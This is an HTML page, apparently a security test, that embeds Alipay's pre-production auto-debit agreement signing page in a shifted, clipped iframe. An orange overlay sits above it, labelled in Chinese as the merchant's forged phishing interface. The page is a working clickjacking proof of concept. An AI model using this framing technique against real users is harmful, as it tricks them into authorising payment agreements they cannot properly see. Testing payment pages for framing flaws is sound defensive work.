<!doctype html>
<html>
<head>
    <meta charset="utf-8">
    <title>H5测试</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=0"/>
    <meta name="apple-mobile-web-app-capable" content="yes"/>
    <meta name="apple-mobile-web-app-status-bar-style" content="black"/>
    <meta name="format-detection" content="telephone=no,email=no"/>
    <link rel="stylesheet" href="https://a.alipayobjects.com/g/antui/antui/10.0.18/dpl/antui.css">
    <script src="https://a.alipayobjects.com/amui/zepto/1.1.3/zepto.js"></script>
    <script src="https://as.alipayobjects.com/g/component/antbridge/1.1.3/antbridge.min.js"></script>
</head>
<body ontouchstart="">
<style>
    .diaoyu {
        position: absolute;
        left: 0;
        z-index: 999;
        width: 100%;
        height: 80px;
        background: #f60;
    }
    .iframe {
        overflow: hidden;
        width: 100%;
        height: 300px;
        position: relative;
    }
    .iframe iframe {
        position: absolute;
        left: -300px;
        width: 800px;
        height: 400px;
    }
</style>
<div class="diaoyu" style="">这里是商户伪造钓鱼界面</div>
<div class="iframe">
    <iframe src="https://mapipre.alipay.com//gateway.do?external_logon_id=external_logon_id%C0%CF%C1%B4%C2%B7%B2%E2%CA%D4&sign_type=MD5&partner=2088721240806806&external_user_id=external_user_id%B2%E2%CA%D4&sales_product_code=FOREX_GENERAL_WITHHOLDING&prod_properties=%7B%22AuthBizInfo%22%3A%7B%22platform%22%3A%22B2B%22%7D%7D&notify_url=http%3A%2F%2Fxuexuan.inc.alipay.net%2Fhome%2Faop%2Fnotify%2Fself%3Fresult%3Dsuccess&provider_hostname=mdeduct.rz00b.alipay.net&access_info=%7B%22channel%22%3A%22PC%22%7D&sendFormat=normal&sign=dd8aeb953dc0e8f32e0eb2a30bf1593a&product_code=GENERAL_WITHHOLDING_P&external_sign_no=dfdfderer34233434&service=alipay.dut.customer.agreement.page.sign&scene=INDUSTRY%7CCARRENTAL" frameborder="0"></iframe>
</div>
<script>
</script>
</body>
</html>
